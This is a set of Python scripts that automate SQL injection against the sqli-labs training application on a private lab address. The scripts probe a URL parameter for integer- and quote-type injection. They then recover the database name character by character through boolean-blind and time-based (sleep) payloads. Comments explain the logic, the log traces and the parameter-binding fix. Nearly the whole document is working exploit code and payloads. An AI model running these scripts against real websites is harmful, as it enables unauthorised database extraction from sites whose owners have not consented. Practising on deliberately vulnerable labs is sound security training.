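#### Check whether the injection is integer-type
import requests
import re

# Browser-like request headers. The pasted dictionary had no commas between
# entries, which is a syntax error. The captured "Host" and "Cookie" entries
# belonged to another site (newtab.firefoxchina.cn) and are left out:
# requests derives Host from the URL, and a mismatched Host can make the
# server answer from a different virtual host than the one under test.
# NOTE: "br" is only decoded when a brotli package is installed; otherwise a
# br-encoded body would be compared in compressed form.
header = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Connection": "keep-alive",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "cross-site",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0",
}

# Seconds to wait for a response; without a timeout requests.get can block
# forever on an unresponsive host.
TIMEOUT = 10

# Placeholders: "输入当前URL" means "enter the current URL". Replace that part
# with the address of the lab page before running.
url1 = "输入当前URL?id=1 and 1=1"
url2 = "输入当前URL?id=1 and 1=2"

response1 = requests.get(url1, headers=header, timeout=TIMEOUT)
response2 = requests.get(url2, headers=header, timeout=TIMEOUT)

# A difference between the always-true and always-false variants suggests
# the appended condition reached the SQL statement unquoted. The comparison
# assumes the page is otherwise deterministic: any per-request content
# (timestamps, tokens) also makes the bodies differ. When the parameter is
# bound through a prepared statement the two pages are identical.
if response1.text != response2.text:
    # Message: "this is an integer-type SQL vulnerability".
    print("该漏洞为整形sql漏洞")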
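#### Check whether the injection is string-type (quoted)
import requests
import re

# Browser-like request headers. The pasted dictionary had no commas between
# entries, which is a syntax error. The captured "Host" and "Cookie" entries
# belonged to another site (newtab.firefoxchina.cn) and are left out:
# requests derives Host from the URL, and a mismatched Host can make the
# server answer from a different virtual host than the one under test.
# NOTE: "br" is only decoded when a brotli package is installed; otherwise a
# br-encoded body would be compared in compressed form.
header = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Connection": "keep-alive",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "cross-site",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0",
}

# Seconds to wait for a response; without a timeout requests.get can block
# forever on an unresponsive host.
TIMEOUT = 10


def is_quotes_inj(url):
    """Report whether a quote- or bracket-closed boolean probe changes the page.

    For each candidate closing sequence the page for ``url`` is compared with
    the pages returned for ``url`` + closer + ``and 1=1`` and ``and 1=2``.
    A closer counts as a hit when the always-true probe matches the baseline
    while the always-false probe differs from both.

    Args:
        url: Page URL ending in the parameter value under test.

    Returns:
        True if at least one closer produced a hit, otherwise False.
    """
    quotes = ["'", '"', ")", "')", '")']
    # The original only assigned its flag on a hit, so a run without any hit
    # raised UnboundLocalError instead of returning False.
    found = False
    # The baseline page does not depend on the closer, so it is fetched once
    # rather than once per candidate.
    baseline = requests.get(url, headers=header, timeout=TIMEOUT).text
    for quote in quotes:
        true_url = url + quote + "%20and 1=1" + "--+"
        false_url = url + quote + "%20and 1=2" + "--+"
        true_text = requests.get(true_url, headers=header, timeout=TIMEOUT).text
        false_text = requests.get(false_url, headers=header, timeout=TIMEOUT).text
        # All three conditions are needed: a page with per-request content
        # would differ between any two fetches, and requiring baseline ==
        # true_text filters most of that noise out.
        if (
            true_text != false_text
            and false_text != baseline
            and baseline == true_text
        ):
            print("this is a {} type of sql injection!".format(quote))
            found = True
        else:
            print(true_url)
    return found


url = "http://192.168.66.128/sqli-labs-master/Less-10/?id=1"
is_quotes_inj(url)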
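#### Extract data with boolean blind injection
import requests
import re

# Browser-like request headers. The pasted dictionary had no commas between
# entries, which is a syntax error. The captured "Host" and "Cookie" entries
# belonged to another site (newtab.firefoxchina.cn) and are left out:
# requests derives Host from the URL, and a mismatched Host can make the
# server answer from a different virtual host than the one under test.
# NOTE: "br" is only decoded when a brotli package is installed; otherwise a
# br-encoded body would be searched in compressed form.
header = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Connection": "keep-alive",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "cross-site",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0",
}

# Seconds to wait for a response; without a timeout requests.get can block
# forever on an unresponsive host.
TIMEOUT = 10

# Candidate characters. The original spelled the alphabets "...wzxy" and
# "...WZYZ": upper-case X was missing and Z appeared twice, so an X could
# never be matched and a Z was appended twice.
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*()_+<>?"
url = "http://192.168.66.128/sqli-labs-master/Less-8/?id=1"
length_payload = "' and length(database())={}--+"
data_payload = "' and ascii(substr(database(),{},1))={}--+"


def get_length(url, length_payload):
    """Find the length for which the page shows its success marker.

    Args:
        url: Lab page URL ending in the parameter value.
        length_payload: Suffix template with one ``{}`` slot for the
            candidate length.

    Returns:
        The first length in 1..49 whose response contains "You are in",
        or None when no candidate matched.
    """
    for x in range(1, 50):
        ex_url = url + length_payload.format(x)
        print(ex_url)
        response = requests.get(ex_url, headers=header, timeout=TIMEOUT)
        # "You are in" is presumably the lab page's text for a query that
        # returned a row -- confirm against the target page.
        if "You are in" in response.text:
            # Message: "the length is".
            print("长度是" + str(x))
            return x
    return None


# The original passed an undefined name `payload` here (NameError).
length = get_length(url, length_payload)


def get_data(url, data_payload, length):
    """Recover the value one character at a time from the page marker.

    Args:
        url: Lab page URL ending in the parameter value.
        data_payload: Suffix template with two ``{}`` slots: the 1-based
            character position and the candidate character code.
        length: Number of characters to recover, as returned by
            ``get_length``; None or 0 yields an empty result.

    Returns:
        The recovered string. A position whose character is not in
        ``chars`` contributes nothing, so the result can be shorter than
        ``length``.
    """
    data = ""
    # get_length returns None when nothing matched; range(1, None + 1)
    # would raise TypeError.
    if not length:
        return data
    for x in range(1, length + 1):
        for char in chars:
            ex_url = url + data_payload.format(x, ord(char))
            response = requests.get(ex_url, headers=header, timeout=TIMEOUT)
            if "You are in" in response.text:
                data += char
                # Message: "the data is".
                print("数据是" + data)
                # Only one character can occupy a position; stopping here
                # avoids needless requests for the rest of the set.
                break
    return data


# Every probe is a separate GET carrying `ascii(substr(` in the query
# string, so a run produces a long, regular burst of near-identical requests
# in the access log. A query that binds `id` as a parameter returns the same
# page for every probe.
name = get_data(url, data_payload, length)
print(name)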
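#### Extract data with time-based (delay) injection
import requests
import time

# Browser-like request headers. The pasted dictionary had no commas between
# entries, which is a syntax error. The captured "Host" and "Cookie" entries
# belonged to another site (newtab.firefoxchina.cn) and are left out:
# requests derives Host from the URL, and a mismatched Host can make the
# server answer from a different virtual host than the one under test.
header = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Connection": "keep-alive",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "cross-site",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0",
}

# Seconds to wait for a response. It must stay above the 3 s sleep in the
# payloads, otherwise a matching probe would time out instead of being timed.
TIMEOUT = 10

# A response slower than this many seconds is read as "condition true".
# Ordinary network or server latency above the threshold gives a false hit.
DELAY_THRESHOLD = 2

# Candidate characters. The original spelled the alphabets "...wzxy" and
# "...WZYZ": upper-case X was missing and Z appeared twice, so an X could
# never be matched and a Z was appended twice.
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*()_+<>?"
url = "http://192.168.66.128/sqli-labs-master/Less-8/?id=1"
length_payload = "' and if(length(database())={},sleep(3),0)--+"
data_payload = "' and if(ascii(substr(database(),{},1))={},sleep(3),0)--+"


def get_length(url, length_payload):
    """Find the length whose probe makes the response slow.

    Args:
        url: Lab page URL ending in the parameter value.
        length_payload: Suffix template with one ``{}`` slot for the
            candidate length.

    Returns:
        The first length in 1..49 whose request took longer than
        ``DELAY_THRESHOLD`` seconds, or None when no candidate did.
    """
    for x in range(1, 50):
        ex_url = url + length_payload.format(x)
        # monotonic() cannot jump when the wall clock is adjusted, unlike
        # time.time(), so the measured interval is always non-negative.
        start = time.monotonic()
        requests.get(ex_url, headers=header, timeout=TIMEOUT)
        elapsed = time.monotonic() - start
        print(elapsed)
        if elapsed > DELAY_THRESHOLD:
            # Message: "the length is".
            print("长度是" + str(x))
            return x
    return None


length = get_length(url, length_payload)


def get_data(url, data_payload, length):
    """Recover the value one character at a time from response delays.

    Args:
        url: Lab page URL ending in the parameter value.
        data_payload: Suffix template with two ``{}`` slots: the 1-based
            character position and the candidate character code.
        length: Number of characters to recover, as returned by
            ``get_length``; None or 0 yields an empty result.

    Returns:
        The recovered string. A position whose character is not in
        ``chars`` contributes nothing, so the result can be shorter than
        ``length``.
    """
    data = ""
    # get_length returns None when nothing matched; range(1, None + 1)
    # would raise TypeError.
    if not length:
        return data
    for x in range(1, length + 1):
        for char in chars:
            ex_url = url + data_payload.format(x, ord(char))
            start = time.monotonic()
            requests.get(ex_url, headers=header, timeout=TIMEOUT)
            elapsed = time.monotonic() - start
            if elapsed > DELAY_THRESHOLD:
                data += char
                # Message: "the data is".
                print("数据是" + data)
                # Only one character can occupy a position; stopping here
                # avoids needless requests for the rest of the set.
                break
    return data


# On the server side each matching probe holds a database connection for the
# sleep duration, so a run appears as a burst of requests with `sleep(` in
# the query string and latencies clustered near 3 s. A query that binds `id`
# as a parameter never evaluates the injected condition.
name = get_data(url, data_payload, length)
print(name)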